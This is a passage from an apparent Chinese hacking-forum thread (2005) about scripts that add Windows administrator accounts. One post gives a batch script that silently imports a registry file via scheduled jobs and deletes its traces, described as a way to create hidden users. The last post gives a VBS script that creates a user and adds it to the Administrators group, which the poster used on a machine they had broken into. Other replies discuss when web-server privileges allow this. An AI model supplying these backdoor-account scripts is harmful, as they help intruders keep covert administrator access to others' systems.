邪恶八进制信息安全团队技术讨论组 » 技术讨论{ Technique Discussions } » [讨论]传说中添加超级用户的asp代码分析

34 ‹‹12

打印

[讨论]传说中添加超级用户的asp代码分析

inetshare

晶莹剔透§烈日灼然

Rank: 1

帖子: 17
精华: 0
积分: 88
阅读权限: 40
在线时间: 1 小时
注册时间: 2005-9-13
最后登录: 2006-6-25

发短消息
加为好友
当前离线

26楼 大中小发表于 2005-12-9 13:33 只看该作者

这样倒不如直接猜管理员的密码。
我那次就成功了。呵呵，乐坏我了~~~

TOP

adly

晶莹剔透§烈日灼然

Rank: 1

帖子: 8
精华: 0
积分: 30
阅读权限: 40
在线时间: 8 小时
注册时间: 2005-11-12
最后登录: 2007-10-7

发短消息
加为好友
当前离线

27楼 大中小发表于 2005-12-17 21:59 只看该作者

请问可以在这里讨论批处理的问题吗?

最近我想利用批处理来做一个自动生成REG文件,但出了问题:

@for /f "tokens=1,2 delims=:" %%a in ('time /t') do @set hh=%%a&&@set mi=%%b
@if %mi%==59 goto a
@set /a hh1=%hh%
@set /a mi1=%mi%+1
@goto b
:a
@set /a hh1=%hh%+1
@set /a mi1=0
:b
@at %hh1%:%mi1% "regedit /s rjh.reg"
@if %mi%==59 goto c
@if %mi%==58 goto d
@set /a hh2=%hh%
@set /a mi2=%mi%+2
:d
@set /a hh2=%hh%+1
@set /a mi2=0
:c
@set /a hh2=%hh%+1
@set /a mi2=1
@at %hh2%:%mi2% del "rjh.reg /f /q"
@del rjh.bat /f /q

不知道错在哪儿,请各位帮一下忙好吗?

编写隐藏用户的批处理思路:

前期准备(比如:生成REG文件)
for /f "tokens=1,2 delims=:" %%a in ('time /t') do @set hh=%%a&&@set mi=%%b
if %mi%==59 goto a
set /a hh1=%hh%
set /a mi1=%mi%+1
goto b
:a
set /a hh1=%hh%+1
set /a mi1=0
set /a flag1="tru"
:b
at %hh1%:%mi1% "regedit /s 要导入的REG文件"
if %flag1%=="tru" goto c
if %mi%==58 goto d
set /a hh2=%hh%
set /a mi2=%mi%+2
:d
set /a hh2=%hh%+1
set /a mi2=0
:c
set /a hh2=%hh%+1
set /a mi2=1
at %hh2%:%mi2% "del 要导入的REG文件"
del 本批处理文件

作者:Adly
QQ:369046978
2005年12月17日

TOP

yaqilles

晶莹剔透§烈日灼然

Rank: 1

帖子: 29
精华: 0
积分: 119
阅读权限: 40
性别: 男
在线时间: 41 小时
注册时间: 2005-4-21
最后登录: 2008-6-9

发短消息
加为好友
当前离线

28楼 大中小发表于 2005-12-18 15:25 只看该作者

我想问执行代码的权限是什么？
上面说的不和常理！
ASP的权限要是能添加administrator的话，我想就不用提权了！

狗咬狗

TOP

偶就一流氓

晶莹剔透§烈日灼然

Rank: 1

帖子: 33
精华: 0
积分: 130
阅读权限: 40
性别: 男
来自: 深圳
在线时间: 27 小时
注册时间: 2005-12-18
最后登录: 2006-2-6

发短消息
加为好友
当前离线

29楼 大中小发表于 2005-12-19 12:33 只看该作者

总之偶没成功过，像楼上兄弟说的，都可以中彩票了。。

日哦，偶名片都三折

TOP

代码罐头

技术核心组

Rank: 8 Rank: 8

E.S.T顾问团成员运营顾问

帖子: 692
精华: 12
积分: 2295
阅读权限: 200
性别: 男
在线时间: 727 小时
注册时间: 2013-11-26
最后登录: 2008-10-26

优秀管理奖核心建议奖原创技术奖技术活跃奖

发短消息
加为好友
当前离线

30楼 大中小发表于 2005-12-19 16:25 只看该作者

我前面提到操作这样的ADSI接口.需要有administrator权限
是否这样就绝对不能利用那.
当然也不是.
因为ADSI同样可以用来操作IIS
所以有个别虚拟主机管理系统因为水平有限.不能做成service或者activex dll
所以直接使用asp来操作IIS
这样他的管理界面的iis实例使用的就是administrator权限了
当然这样的系统我见过.不过不清楚使用人数的多少.因为成熟产品不会用这种手段,这样的系统基本是个人写的.

连入侵者都敢说自己在做网络安全。关键大家是真正为安全作过什么？

TOP

dfsy

晶莹剔透§烈日灼然

Rank: 1

帖子: 24
精华: 0
积分: 81
阅读权限: 40
性别: 男
在线时间: 111 小时
注册时间: 2005-10-14
最后登录: 2008-10-24

发短消息
加为好友
当前离线

31楼 大中小发表于 2005-12-19 19:14 只看该作者

我想.除非是管理员运行IIS的用户的权限不小心加入了管理员组的时候才能成功吧...

TOP

skylove

晶莹剔透§烈日灼然

Rank: 1

帖子: 78
精华: 0
积分: 245
阅读权限: 40
在线时间: 197 小时
注册时间: 2005-11-13
最后登录: 2007-12-3

发短消息
加为好友
当前离线

32楼 大中小发表于 2005-12-22 17:43 只看该作者

代码忘了抄谁的了今天搞了机子不知道是把net.exe 删了还是咋的加不上用户
所以就想起这个办法用楼主的那个vbs 成功了我用这不成功不知道为什么

复制内容到剪贴板

代码:

echo struser=wscript.arguments(0) 

strpass=wscript.arguments(1)

set lp=createObject("WSCRIPT.NETWORK") 

oz="WinNT://"&lp.ComputerName 

Set ob=GetObject(oz) 

Set oe=GetObject(oz&"/Administrators,group") 

Set od=ob.create("user",struser) 

od.SetPassword strpass 

od.SetInfo 

Set of=GetObject(oz&"/" & struser & ",user") 

oe.Add(of.ADsPath) 

For Each admin in oe.Members

if struser=admin.Name then

Wscript.echo struser & " 建立成功!"

wscript.quit 

end if 

Next 

Wscript.echo struser & " 用户建立失败!"